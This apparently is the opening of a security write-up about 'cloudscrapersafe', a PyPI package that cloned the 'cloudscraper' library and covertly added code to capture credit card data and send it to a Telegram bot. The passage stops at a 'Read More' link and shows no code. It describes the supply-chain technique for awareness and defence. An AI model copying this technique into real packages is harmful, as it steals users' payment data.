Introduction On July 6, 2025, a suspicious Python package called 'cloudscrapersafe' was uploaded to the Python Package Index (PyPI). Marketed as a utility to evade Cloudflare’s anti-bot protections, this package was a modified version of a widely used 'cloudscraper' library, which is used to automate access to websites protected by Cloudflare’s IUAM (I’m Under Attack Mode). Within a few hours, the package had already been downloaded and potentially deployed in some environments. Thankfully, PyPI swiftly removed the package after realizing it was malicious. While preserving every original feature of 'cloudscraper', the package secretly embeds logic designed to intercept credit card information and exfiltrate it to an external Telegram bot. It is worth noting that while 'cloudscraper' itself has over 1.4 million downloads and is openly available, it is used to circumvent security protections, a use case that already sits in a gray zone. This highlights the risk of developers importing tools that are both legally questionable and technically dangerous, with little scrutiny over what additional payloads they may include. The attack is a textbook example of supply chain abuse: a malicious actor takes a known open-source library, clones it under a slightly different name, and injects harmful code while preserving the original functionality. The package, 'cloudscrapersafe', retained the scraping and challenge-solving features of 'cloudscraper' but added two specific logic blocks…Read More